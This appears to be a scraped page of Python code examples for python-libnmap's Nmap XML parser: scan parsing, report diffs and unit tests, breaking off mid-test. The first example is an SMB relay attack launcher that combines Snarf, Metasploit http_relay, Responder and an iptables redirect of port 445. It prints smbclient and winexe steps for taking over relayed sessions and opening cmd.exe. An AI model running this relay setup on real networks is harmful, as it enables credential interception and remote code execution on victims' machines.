Ejemplo n.º 1
def main(args):
    # Entry point: requires root, fetches Snarf and Node.js, starts the
    # Metasploit http_relay, Snarf and Responder helpers, adds an iptables NAT
    # rule, then idles until Ctrl-C and passes the started processes to cleanup().
    # `args` must provide home_dir, interface and nmapxml.

    # Initial var setup
    if os.geteuid():
        # A non-zero effective UID means the process is not running as root.
        sys.exit('['+R+'-'+W+'] Please run as root')

    home_dir = args.home_dir
    iface = args.interface
    # First IPv4 address bound to the chosen interface.
    ip = ifaddresses(iface)[AF_INET][0]['addr']
    # NOTE(review): this parse result is overwritten by the second
    # parse_fromfile() call below before anything reads it.
    report = NmapParser.parse_fromfile(args.nmapxml)

    # Get Snarf
    # NOTE(review): the repository is fetched by URL with no commit or tag pinned
    # in this block, and its code is later run by this root process; confirm
    # whether get_git_project() pins or verifies what it downloads.
    github_url = 'https://github.com/purpleteam/snarf'
    get_git_project(github_url, home_dir)

    # Get Nodejs
    get_nodejs()

    # Start MSF http_relay
    msf_pid = start_msf_http_relay(ip, home_dir)

    # Get SMB hosts
    report = NmapParser.parse_fromfile(args.nmapxml)
    get_smb_hosts(report, home_dir)

    # Run Snarf
    # NOTE(review): home_dir and ip are interpolated into one command string;
    # how run_cmd() executes it (shell or argv list) is not visible here, so
    # confirm home_dir cannot carry spaces or shell metacharacters.
    # The paths are joined without a separator, so home_dir is presumably
    # expected to end with '/' - TODO confirm.
    cmd = 'screen -S snarf -dm nodejs {}snarf/snarf.js -f {}smb_hosts.txt {}'.format(home_dir, home_dir, ip)
    out, err, snarf_pid = run_cmd(cmd)

    # Run Snarf iptables cmd
    time.sleep(5) # Give snarf time to startup
    # Appends a NAT PREROUTING rule for TCP/445; removal is presumably done by
    # cleanup() - verify, since the rule outlives this process otherwise.
    cmd = 'iptables -t nat -A PREROUTING -p tcp --dport 445 -j SNARF'
    out, err, iptables_pid = run_cmd(cmd)

    # Start Responder
    resp_pid = start_responder(iface, home_dir)

    # Check that everything ran as it should
    # Need pid+1 because screen -Sdm causes a fork and execve
    # forcing the real screen process to become pid+1
    # NOTE(review): pid+1 is a heuristic; another process may have taken that
    # pid in between, so confirm()/cleanup() should check what they act on.
    pids = [(resp_pid+1, 'Responder'),
            (msf_pid+1, 'Metasploit http_relay'),
            (snarf_pid+1, 'Snarf')]
    confirm(pids)

    print '\n[+] Done! Point your browser to http://localhost:4001 and refresh it every few minutes to see MITM\'d SMB connections'
    print '    After a connection has expired or you manually expire and choose it it run:'
    print '       smbclient -U a%a //127.0.0.1/C$'
    print '    If the initiator of the SMB connection has admin rights try:'
    print '       winexe -U a%a //127.0.0.1/ cmd.exe'
    print '\n[*] Ctrl-C to cleanup'

    # Idle until the operator interrupts; cleanup() only runs on Ctrl-C, so any
    # other termination leaves the helpers and the iptables rule in place.
    try:
        while 1:
            time.sleep(10)
    except KeyboardInterrupt:
        cleanup(pids, home_dir)
        sys.exit()
Ejemplo n.º 2
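def get_report(xmlscan):
    """Parse an Nmap XML file and return the report, or None on failure.

    A strict parse is tried first. If it fails, the file is parsed again with
    ``incomplete=True``, which is how an interrupted scan's output is read.
    Both failures are logged; nothing is raised to the caller.
    """
    if not path.exists(xmlscan):
        logging.error('No file found!')
        return None

    # Try to parse TODO: do it in proper way
    # `except Exception` rather than a bare `except`: Ctrl-C and SystemExit
    # must not be swallowed and turned into a "parse failed" result.
    try:
        return NmapParser.parse_fromfile(xmlscan)
    except Exception:
        logging.warning('Exception during nmap file parsing. Trying to parse it as incomplete...')

    try:
        return NmapParser.parse_fromfile(xmlscan, incomplete=True)
    except Exception:
        logging.error('Exception during parsing nmap file as incomplete. Exiting...')
        return None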
Ejemplo n.º 3
    def __init__(self, old_report=None, new_report=None):
        """Diff two Nmap reports and print the result.

        When either report is missing (or falsy), both are replaced by the
        bundled sample files under ``nmapui/test/``.
        """
        self.changed, self.added, self.removed = [], [], []
        print old_report

        have_both = old_report and new_report
        if not have_both:
            # NOTE(review): a caller that passes only one report silently gets
            # a diff of the two sample files instead of an error.
            print "no valid data.. taking dummy files from disk"
            old_report = NmapParser.parse_fromfile('nmapui/test/1_hosts.xml')
            new_report = NmapParser.parse_fromfile('nmapui/test/1_hosts_diff.xml')
        else:
            print "using given old and new_report"

        # do_diff() takes the new report first, then the old one.
        self.do_diff(new_report, old_report)
        self.print_diff()
Ejemplo n.º 4
def parse_web_servers(files):
    """Return a sorted list of base URLs for every open web service in *files*.

    ``http`` services without an SSL tunnel become ``http://`` URLs; ``https``
    services and ``http`` services tunnelled over SSL become ``https://`` URLs.
    The port is left out when it is the scheme's default (80 or 443).
    Any exception is reported through error() and ends the process.
    """
    try:
        found = set()
        for xml_path in files:
            report = NmapParser.parse_fromfile(xml_path)
            for host in report.hosts:
                for svc in host.services:
                    if not svc.state == "open":
                        continue

                    plain_http = svc.service == 'http' and svc.tunnel != 'ssl'
                    if plain_http:
                        scheme, default_port = "http", 80
                    elif svc.service == 'https' or \
                            (svc.tunnel == 'ssl' and svc.service == 'http'):
                        scheme, default_port = "https", 443
                    else:
                        # Not a web service.
                        continue

                    if svc.port == default_port:
                        found.add(scheme + "://{0}".format(host.address))
                    else:
                        found.add(scheme + "://{0}:{1}".format(host.address,
                                                               svc.port))
        return sorted(found)
    except Exception as e:
        error("Error parsing xml file! %s" % e)
        exit()
Ejemplo n.º 5
 def test_cpeservice(self):
     """The first service of the popped host carries the two expected CPE strings, in order."""
     expected = ['cpe:/a:openbsd:openssh:5.9p1','cpe:/o:linux:linux_kernel']
     report = NmapParser.parse_fromfile(self.flist_os['fullscan']['file'])
     first_service = report.hosts.pop().services[0]
     for position, cpestring in enumerate(expected):
         self.assertEqual(first_service.cpelist[position].cpestring, cpestring)
Ejemplo n.º 6
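def parseNMap(file=None, string=None):
  """Convert an Nmap XML report into a list of per-host dictionaries.

  file   -- path of an Nmap XML file
  string -- Nmap XML document as a string; wins over `file` when both are given

  Each host dict holds mac, ip, status, hostnames, vendor and distance, an
  optional 'osDetect' list of unique CPE strings, and a 'services' list.
  The process exits with "Invalid Nmap xml!" when parsing fails or when
  neither input is supplied.
  """
  report = None
  try:
    if file: report = NmapParser.parse_fromfile(file)
    if string: report = NmapParser.parse_fromstring(string)
  except Exception:
    # Not a bare `except`: Ctrl-C must not be reported as bad XML.
    exit("Invalid Nmap xml!")
  if report is None:
    # Without this check a call with no input failed later with a NameError
    # on `report` instead of the intended message.
    exit("Invalid Nmap xml!")
  systems = []
  for h in report.hosts:
    system = {'mac':h.mac, 'ip':h.address, 'status':h.status, 'hostnames': h.hostnames,
              'vendor':h.vendor, 'distance':h.distance}
    # De-duplicate the CPEs of all OS matches; the resulting order is arbitrary.
    cpeList = list(set(x for c in h.os_match_probabilities() for x in c.get_cpe()))
    if cpeList:
      system['osDetect'] = cpeList
    services = []
    for s in h.services:
      # banner, name and the other values come from the scanned hosts, so
      # consumers should treat them as untrusted text.
      service = {'port':s.port, 'banner':s.banner, 'protocol':s.protocol, 'name':s.service,
                 'state':s.state, 'reason':s.reason}
      if s.cpelist:
        # Only the first CPE of a service is kept.
        service['cpe'] = s.cpelist[0].cpestring
      services.append(service)
    system['services'] = services
    systems.append(system)
  return systems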
Ejemplo n.º 7
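    def nmap_multi_port_syn_ping(self, portlist=(21, 22, 23, 25, 53, 80, 110, 111, 135, 137, 138, 139, 143, 443, 8080)):
        """Run an nmap TCP SYN ping against self.ip_address on the given ports.

        Returns 0 when the report lists at least one host up, otherwise 1.
        Raises TypeError when portlist is not a list/tuple of ints, and OSError
        when nmap exits with a non-zero status. The temporary XML report is
        removed on every path, including failures.
        """
        nmap_xml_file = self.nmap_xml_file_location + '/' + self.nmap_xml_file_name.format(
            "nmap_multi_port_syn_ping", self.ip_address.replace(".", "_"))

        if not isinstance(portlist, (tuple, list)):
            raise TypeError(u"Portlist must be either a list or tuple integers/port numbers.")

        # Only integers reach the command line, so the -PS argument cannot be
        # used to smuggle extra text into the nmap invocation.
        if not all(isinstance(p, int) for p in portlist):
            raise TypeError(u"Port numbers must be an integer!")

        ports = ','.join(str(p) for p in portlist)

        # argv list, no shell: values are passed to nmap as single arguments.
        # NOTE(review): self.ip_address is a positional argument; a value that
        # starts with '-' would be read by nmap as an option. Presumably it is
        # validated where it is assigned - verify.
        proc = Popen([self.nmap_binary, '-oX', nmap_xml_file, '-sP', '-PS' + ports, self.ip_address],
                     stdout=PIPE,
                     stderr=PIPE)
        stdout, stderr = proc.communicate()

        try:
            if proc.returncode != 0:
                error = stderr.strip('\n') if stderr else stdout.strip('\n')
                raise OSError(u"Ran into issue running nmap multi port syn scan: {0}".format(error))
            nmap_report = NmapParser.parse_fromfile(nmap_xml_file)
        finally:
            # Previously the report file was left behind when nmap failed or
            # the XML could not be parsed.
            try:
                remove(nmap_xml_file)
            except OSError:
                pass

        return 0 if nmap_report.hosts_up >= 1 else 1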
Ejemplo n.º 8
	def from_nmap_xml(self, scan_dir=SCAN_DIR):
		# Polls scan_dir for Nmap XML files, imports every host of every file
		# through _create_banner_object(), and moves processed files to
		# scan_dir/archive unless debug mode is on. Ctrl-C ends the loop and
		# calls self._dispose().
		# NOTE(review): every *.xml that appears in scan_dir is parsed and
		# imported; presumably only the scanner can write there - verify the
		# directory permissions.
		try:
			# NOTE(review): no `break` is visible in this loop, so the bulk
			# flush and summary after it are not reached; the loop only ends
			# through an exception such as KeyboardInterrupt.
			while True:
				# Wait, checking every 30 seconds, until at least one file exists.
				while len(glob.glob(scan_dir + "/*.xml")) == 0:
					print "Waiting for nmap scan files..."
					time.sleep(30)
				print "[]-->Processing " + str(len(glob.glob(scan_dir + "/*.xml"))) + " new scans."
				for scan_file in glob.glob(scan_dir + "/*.xml"):
					print "[]-->Importing " + scan_file
					scan_obj = NmapParser.parse_fromfile(scan_file)
					for host in scan_obj.hosts:
						self._scan_count += 1
						# doc_id is the _index in elasticsearch. it's immutable for the host.
						# It is the host's IPv4 address as an integer; in this
						# block it is only printed.
						doc_id = str(int(IPAddress(host.ipv4)))
						print "   Importing banner : " + str(doc_id)
						new_entry_model = self._conn.factory_object(self._index, self._documment_type, bm.host)
						self._create_banner_object(new_entry_model, host)
					# Cleanup processed scans by moving to the 'archive' subdirectory.
					# NOTE(review): in debug mode the file stays in place, so the
					# next pass of the outer loop imports it again.
					if not self._debug_mode:
						shutil.move(scan_file, scan_dir + "/archive")
			if self._bulk_mode:
				bulk_result = self._conn.force_bulk()
				print "[]-->Flushed : " + str(bulk_result) + " from the bulk."
			print "[]-->Processed : " + str(self._scan_count) + " scans, and " + str(self._banner_count) + " banners successfully."
			print "[]-->DONE"
		except KeyboardInterrupt:
			self._dispose()
    def __parse_nmap_xml_file(self,nmap_xml_file):
        '''
        Collect one record (ip, os, port, service, banner) per open service
        found in an Nmap XML result file.

        python-libnmap is imported lazily; when it is missing, install
        instructions are printed and the process exits.
        '''
        try:
            from libnmap.parser import NmapParser
        except:
            print 'Please install python-libnmap first, so you can not import nmap result file!'
            print 'You can use : pip install python-libnmap'
            exit()

        # NOTE(review): `results` is filled below but is neither returned nor
        # stored in the code visible here - confirm how callers obtain it.
        results = []
        try:
            report = NmapParser.parse_fromfile(nmap_xml_file)
            for host in report.hosts:
                matches = host.os.osmatch()
                # First OS match, or an empty string when there is none.
                # (Named `os` in the original, which shadowed the os module.)
                os_guess = matches[0] if len(matches) > 0 else ''
                for svc in host.services:
                    if svc.state != 'open':
                        continue
                    results.append({'ip': host.ipv4,
                                    'os': os_guess,
                                    'port': svc.port,
                                    'service': svc.service,
                                    'banner': svc.banner})
        except Exception as e:
            self.print_result('[-]parse nmap xml file exception:%s'%e)
Ejemplo n.º 10
 def test_osclasses_new(self):
     """OS classes of the last two hosts in the 'nv6' fixture match the expected table.

     The table is indexed as expected[host][osmatch][osclass], with hosts in
     the order they are popped from the report.
     """
     def osclass(kind, vendor, family, gen):
         # Every expected class in this fixture has accuracy 100.
         return {'type': kind, 'accuracy': 100, 'vendor': vendor,
                 'osfamily': family, 'osgen': gen}

     gp = 'general purpose'
     expected = [
         [
             [osclass(gp, 'Apple', 'Mac OS X', '10.8.X'),
              osclass('phone', 'Apple', 'iOS', '5.X'),
              osclass('media device', 'Apple', 'iOS', '5.X')],
         ],
         [
             [osclass(gp, 'Microsoft', 'Windows', '2008')],
             [osclass(gp, 'Microsoft', 'Windows', '7')],
             [osclass('phone', 'Microsoft', 'Windows', 'Phone')],
             [osclass(gp, 'Microsoft', 'Windows', 'Vista'),
              osclass(gp, 'Microsoft', 'Windows', '2008'),
              osclass(gp, 'Microsoft', 'Windows', '7')],
             [osclass(gp, 'Microsoft', 'Windows', 'Vista'),
              osclass(gp, 'Microsoft', 'Windows', '7'),
              osclass(gp, 'Microsoft', 'Windows', '2008')],
         ],
     ]
     report = NmapParser.parse_fromfile(self.flist_os['nv6']['file'])
     hosts = [report.hosts.pop(), report.hosts.pop()]
     for i, host in enumerate(hosts):
         for j, osmatch in enumerate(host.os.osmatches):
             for k, oc in enumerate(osmatch.osclasses):
                 actual = {'type': oc.type, 'accuracy': oc.accuracy, 'vendor': oc.vendor,
                           'osfamily': oc.osfamily, 'osgen': oc.osgen}
                 self.assertEqual(expected[i][j][k], actual)
Ejemplo n.º 11
 def test_fpv5(self):
     """Host at index 4 of the 'nv5' fixture exposes the expected OS fingerprint.

     Checks both the single-string form (os.fingerprint) and the list form
     (os.fingerprints).
     """
     expected_fingerprint = 'OS:SCAN(V=5.21%D=5/8%OT=22%CT=1%CU=37884%PV=Y%DS=0%DC=L%G=Y%TM=536BFE32%P=x\nOS:86_64-unknown-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=8)SEQ\nOS:(SP=101%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=8)OPS(O1=M400CST11NW3%O2=M400CST\nOS:11NW3%O3=M400CNNT11NW3%O4=M400CST11NW3%O5=M400CST11NW3%O6=M400CST11)WIN(\nOS:W1=8000%W2=8000%W3=8000%W4=8000%W5=8000%W6=8000)ECN(R=Y%DF=Y%T=40%W=8018\nOS:%O=M400CNNSNW3%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(\nOS:R=Y%DF=Y%T=40%W=8000%S=O%A=S+%F=AS%O=M400CST11NW3%RD=0%Q=)T4(R=Y%DF=Y%T=\nOS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0\nOS:%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z\nOS:%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G\nOS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n'
     expected_fingerprints = ['OS:SCAN(V=5.21%D=5/8%OT=22%CT=1%CU=37884%PV=Y%DS=0%DC=L%G=Y%TM=536BFE32%P=x\nOS:86_64-unknown-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=8)SEQ\nOS:(SP=101%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=8)OPS(O1=M400CST11NW3%O2=M400CST\nOS:11NW3%O3=M400CNNT11NW3%O4=M400CST11NW3%O5=M400CST11NW3%O6=M400CST11)WIN(\nOS:W1=8000%W2=8000%W3=8000%W4=8000%W5=8000%W6=8000)ECN(R=Y%DF=Y%T=40%W=8018\nOS:%O=M400CNNSNW3%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(\nOS:R=Y%DF=Y%T=40%W=8000%S=O%A=S+%F=AS%O=M400CST11NW3%RD=0%Q=)T4(R=Y%DF=Y%T=\nOS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0\nOS:%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z\nOS:%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G\nOS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n']
     report = NmapParser.parse_fromfile(self.flist_os['nv5']['file'])
     host_os = report.hosts[4].os
     self.assertEqual(host_os.fingerprint, expected_fingerprint)
     self.assertEqual(host_os.fingerprints, expected_fingerprints)
Ejemplo n.º 12
def parseNMap(file=None, string=None):
  """Convert an Nmap XML report into {"systems": [...], "scan": {...}}.

  file   -- path of an Nmap XML file (used first when given)
  string -- Nmap XML document as a string (used when no file is given)

  Raises a bare Exception when neither input is given or parsing fails.
  """
  try:
    if file:
      report = NmapParser.parse_fromfile(file)
    elif string:
      report = NmapParser.parse_fromstring(string)
    else:
      raise Exception
  except:
    # NOTE(review): the original error is discarded here, so callers cannot
    # tell a missing argument from malformed XML.
    raise Exception

  systems = []
  for host in report.hosts:
    entry = {'mac': host.mac, 'ip': host.address, 'status': host.status,
             'hostnames': host.hostnames, 'vendor': host.vendor,
             'distance': host.distance}

    # CPEs of all OS matches, de-duplicated (order is arbitrary).
    all_cpes = [cpe for match in host.os_match_probabilities()
                for cpe in match.get_cpe()]
    unique_cpes = list(set(all_cpes))
    if len(unique_cpes) > 0:
      entry['cpes'] = unique_cpes

    svc_entries = []
    for svc in host.services:
      svc_entry = {'port': svc.port, 'banner': svc.banner,
                   'protocol': svc.protocol, 'name': svc.service,
                   'state': svc.state, 'reason': svc.reason}
      if svc.cpelist:
        # Only the first CPE of a service is kept.
        svc_entry['cpe'] = svc.cpelist[0].cpestring
      svc_entries.append(svc_entry)
    entry['services'] = svc_entries
    systems.append(entry)

  # "type" is read from the report's private _nmaprun["args"] field.
  scan_info = {"time": report.endtime, "type": report._nmaprun["args"]}
  return {"systems": systems, "scan": scan_info}
Ejemplo n.º 13
 def test_fpv6(self):
     """The last host of the 'nv6' fixture exposes the expected OS fingerprint.

     Checks both the single-string form (os.fingerprint) and the list form
     (os.fingerprints).
     """
     expected_fingerprint = "OS:SCAN(V=6.40-2%E=4%D=5/9%OT=88%CT=%CU=%PV=Y%DS=0%DC=L%G=N%TM=536BFF2F%P=x\nOS:86_64-apple-darwin10.8.0)SEQ(SP=F9%GCD=1%ISR=103%TI=RD%TS=A)OPS(O1=M3FD8\nOS:NW4NNT11SLL%O2=M3FD8NW4NNT11SLL%O3=M3FD8NW4NNT11%O4=M3FD8NW4NNT11SLL%O5=\nOS:M3FD8NW4NNT11SLL%O6=M3FD8NNT11SLL)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5\nOS:=FFFF%W6=FFFF)ECN(R=Y%DF=Y%TG=40%W=FFFF%O=M3FD8NW4SLL%CC=N%Q=)T1(R=Y%DF=\nOS:Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=\nOS:Z%F=R%O=%RD=0%Q=)U1(R=N)IE(R=N)\n"
     expected_fingerprints = ['OS:SCAN(V=6.40-2%E=4%D=5/9%OT=88%CT=%CU=%PV=Y%DS=0%DC=L%G=N%TM=536BFF2F%P=x\nOS:86_64-apple-darwin10.8.0)SEQ(SP=F9%GCD=1%ISR=103%TI=RD%TS=A)OPS(O1=M3FD8\nOS:NW4NNT11SLL%O2=M3FD8NW4NNT11SLL%O3=M3FD8NW4NNT11%O4=M3FD8NW4NNT11SLL%O5=\nOS:M3FD8NW4NNT11SLL%O6=M3FD8NNT11SLL)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5\nOS:=FFFF%W6=FFFF)ECN(R=Y%DF=Y%TG=40%W=FFFF%O=M3FD8NW4SLL%CC=N%Q=)T1(R=Y%DF=\nOS:Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=\nOS:Z%F=R%O=%RD=0%Q=)U1(R=N)IE(R=N)\n']
     report = NmapParser.parse_fromfile(self.flist_os['nv6']['file'])
     host_os = report.hosts.pop().os
     self.assertEqual(host_os.fingerprint, expected_fingerprint)
     self.assertEqual(host_os.fingerprints, expected_fingerprints)
Ejemplo n.º 14
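def get_SMB_hosts(args):
    """Return the path of the SMB host list selected by the arguments.

    With args.nmapxml set, the Nmap XML report is parsed and
    create_smb_hostfile() writes the list under args.home_dir. Otherwise
    args.list_ips is returned unchanged. Returns None when neither option was
    given (this case used to fail with UnboundLocalError).
    """
    hostfile = None
    if args.nmapxml:
        report = NmapParser.parse_fromfile(args.nmapxml)
        hostfile = create_smb_hostfile(report, args.home_dir)
    elif args.list_ips:
        hostfile = args.list_ips
    return hostfile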
Ejemplo n.º 15
def Parse(filename, output):
    """Write a per-host TCP port summary of an Nmap XML report as CSV.

    filename -- path of the Nmap XML report
    output   -- object with a write() method that receives the CSV text

    Columns: machine, open, filtered, closed, OS detection guess, ICMP response.
    Every port that is not open is counted as closed.
    """
    report = NmapParser.parse_fromfile(filename)
    print "Nmap scan summary: {0}".format(report.summary)
    output.write("TCP\n")
    output.write("Machine,Open,Filtered,Closed,OS detection guess,ICMP response\n")
    # NOTE(review): values taken from the scan (address, OS guess, status) are
    # written without CSV quoting, so a comma in an OS name shifts the columns;
    # the csv module would quote them.
    for host in report.hosts:
        open_count = 0
        closed_count = 0
        output.write(str(host.address)+",")
        for port_id, proto in host.get_ports():
            if host.get_service(port_id, proto).open():
                open_count += 1
            else:
                closed_count += 1
        # The filtered count is cut out of the string form of
        # extraports_state['count'] - presumably shaped like
        # "{...: '<n>' ...}"; TODO confirm against libnmap.
        count_text = str(host.extraports_state['count'])
        filtered_count = int(count_text.split(":")[1].split("'")[1])
        output.write(str(open_count)+","+str(filtered_count)+","+str(closed_count)+",")
        if not host.os_fingerprinted:
            output.write("Unknown,")
        else:
            for match in host.os_match_probabilities():
                # str(match) is split on ':'; the first piece is the name and
                # the second word of the next piece is written as a percentage.
                pieces = str(match).split(":")
                guess = pieces[0].strip("\r\n")
                accuracy = pieces[1].split(" ")[1].strip("\r\n")
                output.write(guess + "("+accuracy+"%) / ")
            output.write(",")

        output.write(host.status)
        output.write("\r\n")
Ejemplo n.º 16
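def worker(self, targets, options):
    """Run one nmap scan and return its parsed result as a plain dict.

    targets -- whitespace-separated scan targets
    options -- nmap command-line options as a single string

    The result holds start_time/end_time of the job and a "result" section
    with the target count, the number of failures and one "details" entry
    containing either the parsed hosts or the error text.
    """
    # Imported here because the file's import block is outside this block.
    import shlex

    print(targets)
    print(options)
    result = {
        "start_time": datetime.utcnow(),
        "end_time": datetime.utcnow(),
        "result": {
            "total": len(targets.split()),
            "failed": 0,
            "details": []
        }
    }

    temp_file = "{}.log".format(str(uuid.uuid1()))
    # Build an argv list and run it without a shell. The previous version
    # formatted targets and options into one string and ran it with
    # shell=True, so shell metacharacters in either value (';', '|', '$(...)')
    # were executed as extra commands.
    # NOTE(review): `options` is still free-form nmap flags (output files,
    # scripts, ...); callers that take it from users should allow-list it.
    scan_cmd = (["nmap"] + shlex.split("{}".format(options))
                + ["-oX", temp_file] + shlex.split("{}".format(targets)))

    item = {}

    try:
        # Inside the try: without a shell, a missing nmap binary raises
        # OSError, which is then recorded as a failed scan.
        call(scan_cmd)
        parser_result = NmapParser.parse_fromfile(temp_file)
        item["start_time"] = parser_result.started
        item["end_time"] = parser_result.endtime
        # Key spelling kept as-is: consumers may already read "elasped".
        item["elasped"] = parser_result.elapsed
        item["commandline"] = parser_result.commandline
        item["error"] = ""
        item["hosts"] = []

        for host in parser_result.hosts:
            host_item = {
                "address": host.address,
                "status": host.status,
                "vendor": host.vendor,
                "services": [],
            }
            for service in host.services:
                service_item = {
                    "port": service.port,
                    "tunnel": service.tunnel,
                    "protocol": service.protocol,
                    "state": service.state,
                    "service": service.service,
                    "banner": service.banner,
                }
                host_item["services"].append(service_item)
            item["hosts"].append(host_item)
    except Exception as e:
        print(e)
        item["error"] = e.__repr__()
        result["result"]["failed"] += 1
    finally:
        # Remove the report on every path; it used to be left behind whenever
        # the scan or the parsing failed.
        try:
            if os.path.exists(temp_file):
                os.remove(temp_file)
        except OSError:
            pass

    result["result"]["details"].append(item)

    result["end_time"] = datetime.utcnow()
    return result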
Ejemplo n.º 17
def execute(db,filename):
    """Load one Nmap XML report into the database.

    The report header is saved first; the id it returns is then used to save
    the report's hosts.
    """
    print "Loading %s into database..." % filename

    report = NmapParser.parse_fromfile(filename)
    scan_id = save_report_header(db, report)
    save_hosts(db, scan_id, report.hosts)

    print "File loaded."
Ejemplo n.º 18
 def test_os_class_probabilities(self):
     """The last OS class of the popped host is a Linux 3.X general-purpose match at 100%."""
     report = NmapParser.parse_fromfile(self.fos_class_probabilities)
     host = report.hosts.pop()
     os_class = host.os_class_probabilities().pop()
     expected = (
         ("type", "general purpose"),
         ("vendor", "Linux"),
         ("osfamily", "Linux"),
         ("osgen", "3.X"),
         ("accuracy", 100),
     )
     for attribute, value in expected:
         self.assertEqual(getattr(os_class, attribute), value)
Ejemplo n.º 19
 def test_fp(self):
     """Hosts are flagged as OS-fingerprinted exactly when the fixture entry's "os" value is non-zero."""
     for fixture in self.flist_full:
         report = NmapParser.parse_fromfile(fixture["file"])
         expected_os = fixture["os"]
         for scanned_host in report.hosts:
             if expected_os != 0:
                 self.assertTrue(scanned_host.os_fingerprinted)
             elif expected_os == 0:
                 self.assertFalse(scanned_host.os_fingerprinted)
             else:
                 # Only reachable for a value that is neither != 0 nor == 0.
                 raise Exception
Ejemplo n.º 20
def parseNmap(filename):
 # Reads an Nmap XML report, sorts every open service into http, https or
 # "other", then - depending on the module-level flags findWeb and findPort,
 # which are read here but defined elsewhere - probes the web services with
 # testFakeURI()/testURI() and passes the other ports to lookupPort().
 # ipList, portList, stateList and serviceList are never used in this block.
 ipList=[]
 httpList=[]
 httpsList=[]
 portList=[]
 portsList=[]
 stateList=[]
 serviceList=[]

 # NOTE(review): `tree` is not used in this block, so the file is parsed
 # twice. xml.etree.ElementTree is documented as not secure against
 # maliciously constructed data, which matters if reports come from
 # untrusted sources.
 with open (filename, 'rt') as file:
  tree=ElementTree.parse(file)
 rep = NmapParser.parse_fromfile(filename)
 for _host in rep.hosts:
  ip = (_host.address)
  for services in _host.services:
   # Only open services are collected, as [ip, port] string pairs.
   if services.state=="open":
    if services.service=="http":
     httpList.append([str(ip),str(services.port)])
    elif services.service=="https":
     httpsList.append([str(ip),str(services.port)])
    else:
     portsList.append([str(ip),str(services.port)])
 if findWeb==True:
  if len(httpList)>0:
   for x in httpList:
    # `url` is only referenced by the commented-out code below.
    url = "http://"+x[0]+":"+x[1]

    #if isUp(x[0])==False:
    # print "[!] The IP address is not pingable. Please verify if the host is up"
    # sys.exit()
    #print "\nTesting: "+url
    scheme = "http"
    hostNo = x[0]
    portNo = x[1]
    # testURI() runs only when testFakeURI() returns False; per the message
    # in the else branch, the other case means the server answers 200 for
    # every URL.
    if testFakeURI(scheme,hostNo,portNo)==False:
     print "- Testing: "+hostNo+":"+str(portNo)
     testURI(scheme,hostNo,portNo)
    else:
     print "- Web server return status code 200 for all URLs. Please use the -detect argument for advanced detection"
 if findWeb==True:
  if len(httpsList)>0:
   for x in httpsList:
    url = "https://"+x[0]+":"+x[1]
    #print "\nTesting: "+url
    scheme = "https"
    hostNo = x[0]
    portNo = x[1]
    # Same check as for http, without the "- Testing" progress line.
    if testFakeURI(scheme,hostNo,portNo)==False:
     testURI(scheme,hostNo,portNo)
    else:
     print "- Web server return status code 200 for all URLs. Please use the -detect argument for advanced detection"
 if findPort==True:
  if len(portsList)>0:
   for x in portsList:
    lookupPort(x[0],x[1])
Ejemplo n.º 21
    def test_diff_host_list(self):
        """Report diffs classify scan attributes and hosts as changed, unchanged, added or removed.

        Covers three comparisons: one host vs. two hosts, a report vs. an
        identical copy, and two hosts vs. the same two with one host altered.
        """
        fixture_dir = os.path.dirname(os.path.realpath(__file__))

        def load(relative_path):
            return NmapParser.parse_fromfile("%s/%s" % (fixture_dir, relative_path))

        r1 = load('files/1_hosts.xml')
        r2 = load('files/2_hosts.xml')
        r3 = load('files/1_hosts.xml')
        r4 = load('files/2_hosts_achange.xml')

        # One host compared with two.
        d1 = r1.diff(r2)
        self.assertEqual(d1.changed(), {'hosts_total', 'commandline',
                                        'hosts_up', 'scan_type', 'elapsed'})
        self.assertEqual(d1.unchanged(), {'hosts_down', 'version',
                                          'NmapHost::127.0.0.1'})
        self.assertEqual(d1.removed(), {'NmapHost::74.207.244.221'})

        # Identical reports: everything is unchanged.
        d2 = r1.diff(r3)
        self.assertEqual(d2.changed(), set())
        self.assertEqual(d2.unchanged(), {'hosts_total', 'commandline',
                                          'hosts_up', 'NmapHost::127.0.0.1',
                                          'elapsed', 'version', 'scan_type',
                                          'hosts_down'})
        self.assertEqual(d2.added(), set())
        self.assertEqual(d2.removed(), set())

        # Same host set, one host altered.
        d3 = r2.diff(r4)
        self.assertEqual(d3.changed(), {'NmapHost::127.0.0.1'})
        self.assertEqual(d3.unchanged(), {'hosts_total', 'commandline',
                                          'hosts_up',
                                          'NmapHost::74.207.244.221',
                                          'version', 'elapsed', 'scan_type',
                                          'hosts_down'})
        self.assertEqual(d3.added(), set())
        self.assertEqual(d3.removed(), set())
Ejemplo n.º 22
    def test_osmatches_old(self):
        """OS matches of host index 4 in the 'nv5' fixture match the expected list, in order."""
        report = NmapParser.parse_fromfile(self.flist_os['nv5']['file'])
        host = report.hosts[4]
        expected = [
